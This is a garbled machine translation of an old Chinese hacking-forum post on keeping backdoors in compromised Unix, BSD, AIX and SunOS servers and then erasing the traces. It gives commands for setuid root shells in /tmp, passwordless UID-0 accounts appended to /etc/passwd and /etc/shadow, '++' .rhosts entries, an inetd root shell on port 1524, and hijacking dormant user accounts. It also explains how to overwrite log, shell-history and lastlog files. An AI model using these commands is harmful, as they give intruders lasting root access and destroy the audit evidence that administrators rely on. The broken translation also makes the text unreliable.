System back door approach and the log of the Erasure-vulnerability warning-the black bar safety net

ID MYHACK58:62200821029
Type myhack58
Reporter 佚名
Modified 2008-11-10T00:00:00


Finally got too the server very easy, if to be found, just gone! Alas! In fact, the open back door there are many ways

1. setuid

cp /bin/sh /tmp/.sh

chmod u+s /tmp/.sh

Add suid bit to the shell on, although very simple, but easy to be found

2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd That is, to the system to increase A The id is 0 for root)account, no password. But the administrator soon be found!

  1. echo "++">>/. rhosts If this system opened 5 1 2,5 1 3 The port huh, you can The one called hack Add to. rhosts file, rlogin login, no password!

  2. Modify the sendmail. cf file to add a"wiz" command; Then telnet 2 5, wiz。。。。 ok

5。 Change existing user password

If the host has a lot of users, when you see a user haven't logged in, you can change his password

passwd you can use passwd command.

  1. rootkit Backdoor package

Online there are a lot of places to download, find, try it for yourself, I'm also in the test! Not at all.!!!!

-Bsd back door: the

echo love::9 2:2 0 6::0:0::/:/bin/sh >> /etc/master. passwd /usr/sbin/pwd_mkdb /etc/master. passwd

Here I add a love of user ID is 9 2; The ROOT is 0! Well we added one user! Then the permissions are not enough? cp /bin/sh /tmp/. x (The x is whatever is selected, like . sh , . a , . b, and so on chmod 7 7 7 /tmp/. x chmod +s /tmp/. x With this make him a small back door. After we landed the broiler since you can use the/tmp/. x to elevate privileges.

-AIX Backdoor (Kelvinzhou teach me, thank you.

echo "ingreslock stream tcp nowait root /bin/sh">>/tmp/. x /usr/sbin/inetd-s /tmp/. x rm /tmp/. x So you can telnet ip 1 5 2 4 direct get rootshell

-SunOs Backdoor

echo "love::0:0::/:/bin/bash" >> /etc/passwd echo "love::::::::" >> /etc/shadow

When you telnet, you are root! But not insurance!

-Linux Backdoor

echo "love::0:0::/:/bin/bash" >> /etc/passwd echo "love::::::::" >> /etc/shadow

Sometimes between the words, it left a few backdoors in!

Left rear door will RUB your PP, not a right, it also forget!

Unix system log files are usually stored in "/var/log and /var/adm" directory. Typically we can view the syslog. conf see log configuration in the case. Such as: cat /etc/syslog. conf Generally we want to clear the log







In addition, various shell will also record the user using the command history, it uses the user's home directory under the file to record the command history, usually the name of this file to. sh_history (ksh), the. history (csh), or. bash_history (bash), etc.

If you have like a wipe. c as a clear log of the program, you can get it to do otherwise requires manual! Recommended not to use rm off the log, the best is, the log adapted

For example:

cat > /usr/log/lastlog

- > The Here is what you want to write something, also can not enter!

^d - > A here the^d key ctrl + d! The end!

Well not to say, to learn how are more, I'm also very dish! see!